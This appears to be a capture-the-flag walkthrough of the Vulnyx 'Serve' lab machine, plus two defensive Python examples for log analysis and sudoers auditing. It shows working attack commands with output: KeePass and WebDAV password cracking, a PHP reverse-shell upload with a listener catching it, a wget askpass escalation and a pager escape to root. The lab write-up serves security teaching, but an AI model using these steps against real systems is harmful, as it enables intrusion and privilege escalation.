Vulnyx-Serve-Walkthrough
城南花已开 Lv6

Information Gathering

Service Discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.210 08:00:27:ef:f2:b5 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:e5:e5:eb VMware, Inc.

6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.029 seconds (126.17 hosts/sec). 4 responded
export ip=192.168.60.210
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Scanning ports: The virtual equivalent of knocking on doors.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.210:22
Open 192.168.60.210:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-26 15:45 CST
Initiating ARP Ping Scan at 15:45
Scanning 192.168.60.210 [1 port]
Completed ARP Ping Scan at 15:45, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:45
Completed Parallel DNS resolution of 1 host. at 15:45, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:45
Scanning 192.168.60.210 [2 ports]
Discovered open port 80/tcp on 192.168.60.210
Discovered open port 22/tcp on 192.168.60.210
Completed SYN Stealth Scan at 15:45, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.60.210
Host is up, received arp-response (0.0011s latency).
Scanned at 2025-02-26 15:45:57 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:EF:F2:B5 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Scan for directories.

This yields a hint.

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt,log -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.210
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: zip,txt,log,php,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 10701]
/javascript (Status: 301) [Size: 321] [--> http://192.168.60.210/javascript/]
/notes.txt (Status: 200) [Size: 173]
/secrets (Status: 301) [Size: 318] [--> http://192.168.60.210/secrets/]
/webdav (Status: 401) [Size: 461]
Progress: 1245858 / 1245864 (100.00%)
===============================================================
Finished
===============================================================


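Sensitive File Disclosure

So we add another extension and scan the /secrets directory again; I suspect the credentials are stored in a kdbx file.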

❯ gobuster dir -u http://$ip/secrets -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt,log,kdbx -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.210/secrets
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt,log,kdbx
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 7]
/db.kdbx (Status: 200) [Size: 2078]

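Download it locally and open it.

This gives the WebDAV credentials admin:w3bd4vXXX

According to the hint, the last three characters have to be brute-forced.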

❯ wget http://192.168.60.210/secrets/db.kdbx
--2025-02-26 15:59:59-- http://192.168.60.210/secrets/db.kdbx
Connecting to 192.168.60.210:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2078 (2.0K)
Saving to: ‘db.kdbx’

db.kdbx 100%[==============>] 2.03K --.-KB/s in 0s

2025-02-26 15:59:59 (710 MB/s) - ‘db.kdbx’ saved [2078/2078]

❯ keepass2john db.kdbx>hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 60000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
dreams (db)
1g 0:00:00:02 DONE (2025-02-26 16:00) 0.4830g/s 316.9p/s 316.9c/s 316.9C/s sunshine1..sweetpea
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
❯ kpcli --kdb=db.kdbx
Provide the master password: *************************

KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.

kpcli:/> ls
=== Groups ===
db/
kpcli:/> cd db/
kpcli:/db> ls
=== Groups ===
Papelera de reciclaje/
=== Entries ===
0. WebDAV

kpcli:/db> show WebDAV -f

Path: /db/
Title: WebDAV
Uname: admin
Pass: w3bd4vXXX
URL:
Notes: Notas

Generate a wordlist with crunch, then brute-force with hydra.

The password is w3bd4v513

❯ crunch 9 9 -t w3bd4v%%% -o dic.txt
Crunch will now generate the following amount of data: 10000 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 1000

crunch: 100% completed generating output
head dic.txt
w3bd4v000
w3bd4v001
w3bd4v002
w3bd4v003
w3bd4v004
w3bd4v005
w3bd4v006
w3bd4v007
w3bd4v008
w3bd4v009

❯ hydra -l admin -P dic.txt $ip http-get /webdav -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-26 16:10:15
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1000 login tries (l:1/p:1000), ~63 tries per task
[DATA] attacking http-get://192.168.60.210:80/webdav
[80][http-get] host: 192.168.60.210 login: admin password: w3bd4v513
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-26 16:10:20

WebDAV Upload

WebDav - HackTricks

davtest can be used to test which file types can be uploaded.

❯ davtest -auth admin:w3bd4v513 -move -sendbd auto -url http://$ip/webdav
********************************************************
Testing DAV connection
OPEN SUCCEED: http://192.168.60.210/webdav
********************************************************
NOTE Random string for this session: q5NHnyI1JGN
********************************************************
Creating directory
MKCOL SUCCEED: Created http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN
********************************************************
Sending test files (MOVE method)
PUT txt SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN_txt.txt
MOVE txt SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.txt
MOVE txt SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.txt;.txt
PUT txt SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN_jsp.txt
MOVE jsp SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.jsp
MOVE jsp SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.jsp;.txt
PUT txt SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN_php.txt
MOVE php SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.php
MOVE php SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.php;.txt
PUT txt SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN_shtml.txt
MOVE shtml SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.shtml
MOVE shtml SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.shtml;.txt
PUT txt SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN_cfm.txt
MOVE cfm SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.cfm
MOVE cfm SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.cfm;.txt
PUT txt SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN_asp.txt
MOVE asp SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.asp
MOVE asp SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.asp;.txt
PUT txt SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN_pl.txt
MOVE pl SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.pl
MOVE pl SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.pl;.txt
PUT txt SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN_html.txt
MOVE html SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.html
MOVE html SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.html;.txt
PUT txt SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN_aspx.txt
MOVE aspx SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.aspx
MOVE aspx SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.aspx;.txt
PUT txt SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN_jhtml.txt
MOVE jhtml SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.jhtml
MOVE jhtml SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.jhtml;.txt
PUT txt SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN_cgi.txt
MOVE cgi SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.cgi
MOVE cgi SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.cgi;.txt
********************************************************
Checking for test file execution
EXEC txt SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.txt
EXEC txt SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.txt;.txt
EXEC jsp FAIL
EXEC php SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.php
EXEC php FAIL
EXEC shtml FAIL
EXEC cfm FAIL
EXEC asp FAIL
EXEC pl FAIL
EXEC html SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.html
EXEC html SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.html;.txt
EXEC aspx FAIL
EXEC jhtml FAIL
EXEC cgi FAIL
********************************************************
Sending backdoors
** ERROR: Unable to find a backdoor for txt **
** ERROR: Unable to find a backdoor for html **

********************************************************
/usr/bin/davtest Summary:
Created: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.txt
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.txt;.txt
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.jsp
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.jsp;.txt
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.php
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.php;.txt
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.shtml
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.shtml;.txt
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.cfm
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.cfm;.txt
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.asp
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.asp;.txt
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.pl
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.pl;.txt
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.html
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.html;.txt
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.aspx
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.aspx;.txt
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.jhtml
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.jhtml;.txt
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.cgi
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.cgi;.txt
Executes: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.txt
Executes: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.txt;.txt
Executes: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.php
Executes: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.html
Executes: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.html;.txt

We find that PHP files can be uploaded, so we use cadaver to upload a webshell.

❯ cadaver http://$ip/webdav
Authentication required for webdav on server `192.168.60.210':
Username: admin
Password:
dav:/webdav/> put ../php-reverse-shell.php
Uploading ../php-reverse-shell.php to `/webdav/php-reverse-shell.php':
Progress: [=============================>] 100.0% of 5496 bytes succeeded.
dav:/webdav/> exit
Connection to `192.168.60.210' closed.
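
Seen from the server side, the password guessing and the upload above leave a recognizable trail in the web access log. The following Python is an added example, not part of the original walkthrough: it assumes Apache-style combined log lines, and the log entries, the second client address 192.168.60.50, the threshold and the function names are constructed for illustration.

```python
import re
from collections import Counter

# Apache "combined" log layout is an assumption; the page shows no server logs.
LINE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
SCRIPT_EXT = (".php", ".phtml", ".phar")  # extensions a PHP handler may execute
FAIL_THRESHOLD = 20                        # 401s from one client before alerting


def log_row(ip, user, method, path, status):
    """Build one constructed access-log line."""
    return (f'{ip} - {user} [26/Feb/2025:16:10:15 +0800] '
            f'"{method} {path} HTTP/1.1" {status} 461 "-" "-"')


def build_sample():
    """Constructed log: guessing burst, accepted login, script upload, script fetch."""
    src, other = "192.168.60.100", "192.168.60.50"
    rows = [log_row(other, "-", "GET", "/index.html", 200)]
    rows += [log_row(src, "admin", "GET", "/webdav", 401) for _ in range(40)]
    rows += [
        log_row(src, "admin", "GET", "/webdav", 301),
        log_row(src, "admin", "PUT", "/webdav/php-reverse-shell.php", 201),
        log_row(other, "admin", "PUT", "/webdav/report.txt", 201),
        log_row(src, "-", "GET", "/webdav/php-reverse-shell.php", 200),
    ]
    return rows


def analyze(lines, dav_prefix="/webdav"):
    """Return findings for auth guessing and script upload under the DAV path."""
    failures = Counter()   # 401 responses per client IP on the DAV path
    uploaded = {}          # uploaded script path -> uploading IP
    findings = []
    for raw in lines:
        m = LINE.match(raw)
        if not m or not m["path"].startswith(dav_prefix):
            continue
        ip, method, path = m["ip"], m["method"], m["path"]
        status = int(m["status"])
        if status == 401:
            failures[ip] += 1
        elif failures[ip] >= FAIL_THRESHOLD and status < 400:
            # Many rejections followed by an accepted request from the same client.
            findings.append(("auth-guessing-succeeded", ip, failures[ip]))
            failures[ip] = 0  # report once per burst
        if method == "PUT" and status in (201, 204) and path.lower().endswith(SCRIPT_EXT):
            uploaded[path] = ip
            findings.append(("script-uploaded", ip, path))
        elif method in ("GET", "POST") and status == 200 and path in uploaded:
            findings.append(("uploaded-script-requested", ip, path))
    return findings


if __name__ == "__main__":
    for finding in analyze(build_sample()):
        print(finding)
```

A rename such as davtest's MOVE from .txt to .php only shows its target in the Destination request header, so catching it requires logging that header (for example `%{Destination}i` in the Apache LogFormat).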

User Privilege Escalation

Listen on a port.

A user named teo exists.

❯ pwncat-cs -lp 4444
[16:19:12] Welcome to pwncat 🐈! __main__.py:164
[16:19:36] received connection from 192.168.60.210:46166 bind.py:84
[16:19:36] 0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash manager.py:957
[16:19:37] 192.168.60.210:46166: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@serve:/$ cat /etc/passwd |grep "/bin/bash"
root:x:0:0:root:/root:/bin/bash
teo:x:1000:1000:teo,,,:/home/teo:/bin/bash

In addition, www-data has sudo rights as teo

and can run wget.

(remote) www-data@serve:/$ sudo -l
Matching Defaults entries for www-data on Serve:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on Serve:
(teo) NOPASSWD: /usr/bin/wget
(remote) www-data@serve:/var/tmp$ echo -e '#!/bin/sh\n/bin/sh 1>&0' >aa
(remote) www-data@serve:/var/tmp$ chmod +x aa
(remote) www-data@serve:/var/tmp$ sudo -u teo /usr/bin/wget --use-askpass=/var/tmp/aa 0
teo@serve:/var/tmp$ cd ~
teo@serve:~$ cat user.txt
28bf16070abffab749a16bd11f635474

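Root Privilege Escalation

The teo user also has sudo rights and can run /usr/local/bin/bro.

It turns out to call Bropages.

This is really just a tool similar to man pages.

So privileges can be escalated directly.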

teo@serve:~$ sudo -l
Matching Defaults entries for teo on Serve:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User teo may run the following commands on Serve:
(root) NOPASSWD: /usr/local/bin/bro
teo@serve:~$ ls -al /usr/local/bin/bro
-rwxr-xr-x 1 root root 600 Nov 10 2021 /usr/local/bin/bro
teo@serve:~$ cat /usr/local/bin/bro
#!/usr/bin/ruby2.5
#
# This file was generated by RubyGems.
#
# The application 'bropages' is installed as part of a gem, and
# this file is here to facilitate running it.
#

require 'rubygems'

version = ">= 0.a"

if ARGV.first
str = ARGV.first
str = str.dup.force_encoding("BINARY") if str.respond_to? :force_encoding
if str =~ /\A_(.*)_\z/ and Gem::Version.correct?($1) then
version = $1
ARGV.shift
end
end

if Gem.respond_to?(:activate_bin_path)
load Gem.activate_bin_path('bropages', 'bro', version)
else
gem "bropages", version
load Gem.bin_path("bropages", "bro", version)
end
teo@serve:~$ sudo -l
Matching Defaults entries for teo on Serve:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User teo may run the following commands on Serve:
(root) NOPASSWD: /usr/local/bin/bro
teo@serve:~$ sudo /usr/local/bin/bro
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::NIL is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::Data is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::TRUE is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::FALSE is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::Fixnum is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::Bignum is deprecated
Bro! Specify a command first!

* For example try bro curl

* Use bro help for more info

teo@serve:~$ sudo /usr/local/bin/bro curl
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::NIL is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::Data is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::TRUE is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::FALSE is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::Fixnum is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::Bignum is deprecated
30 entries for curl -- submit your own example with "bro add curl"

# get the contents of a web page
curl http://bropages.org

bro thanks to upvote (133)
bro ...no to downvote (7)

.................................................................................................................................................

# download a file and write it to another file called myfile.html
curl -o myfile.html http://bropages.org

bro thanks 2 to upvote (66)
bro ...no 2 to downvote (0)

.................................................................................................................................................

# Download a file using its original filename, follow all redirects, and continue where you left off if the download previously failed
curl -LOC - http://foo.bar/file.ext

bro thanks 3 to upvote (56)
bro ...no 3 to downvote (0)

.................................................................................................................................................

# Get my external IP address
curl ifconfig.me/ip

# Get my remote host
curl ifconfig.me/host

# Get my user agent
curl ifconfig.me/ua

# Get port
curl ifconfig.me/port

!/bin/bash
root@serve:/home/teo# cat /root/root.txt
981f4425d4ffcb3fb2fe145463b1d476
root@serve:/home/teo#
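
Both escalations above come from sudoers rules that name a bare binary: a command listed without arguments may be run with any arguments, and NOPASSWD removes the password prompt. As an added example (not from the original post), this Python parses `sudo -l` output and flags such rules; the wget and bro rules are copied from the page, while the `systemctl` rule and all function names are constructed for contrast.

```python
import re

# Rule lines for www-data and teo are taken from the page's `sudo -l` output;
# the systemctl rule is constructed to show an argument-restricted entry.
SUDO_L_OUTPUT = """\
User www-data may run the following commands on Serve:
    (teo) NOPASSWD: /usr/bin/wget
User teo may run the following commands on Serve:
    (root) NOPASSWD: /usr/local/bin/bro
    (root) NOPASSWD: /usr/bin/systemctl restart apache2
"""

RULE = re.compile(r'^\s*\((?P<runas>[^)]+)\)\s*(?P<rest>.+)$')
TAG = re.compile(r'^([A-Z_]+):\s*')   # NOPASSWD:, NOEXEC:, SETENV:, ...


def parse_sudo_l(text):
    """Turn the rule lines of `sudo -l` output into dictionaries."""
    rules = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # header and Defaults lines
        rest, tags = m["rest"], set()
        while (t := TAG.match(rest)):
            tags.add(t.group(1))
            rest = rest[t.end():]
        # Several commands may share one line, separated by commas.
        for cmd in re.split(r',\s*(?=/|ALL\b)', rest):
            path, _, args = cmd.strip().partition(" ")
            rules.append({"runas": m["runas"], "tags": tags,
                          "path": path, "args": args.strip()})
    return rules


def risky(rules):
    """Passwordless rules with no argument limit and no NOEXEC tag."""
    flagged = []
    for r in rules:
        # Bare path or wildcard means any arguments; '""' would mean none allowed.
        unrestricted = r["path"] == "ALL" or r["args"] == "" or "*" in r["args"]
        if "NOPASSWD" in r["tags"] and "NOEXEC" not in r["tags"] and unrestricted:
            flagged.append((r["runas"], r["path"]))
    return flagged


if __name__ == "__main__":
    for runas, path in risky(parse_sudo_l(SUDO_L_OUTPUT)):
        print(f"review: {path} runs as {runas} without password or argument limits")
```

An argument limit addresses the wget case; for a tool like bro that hands its output to a pager, removing the rule is the reliable fix.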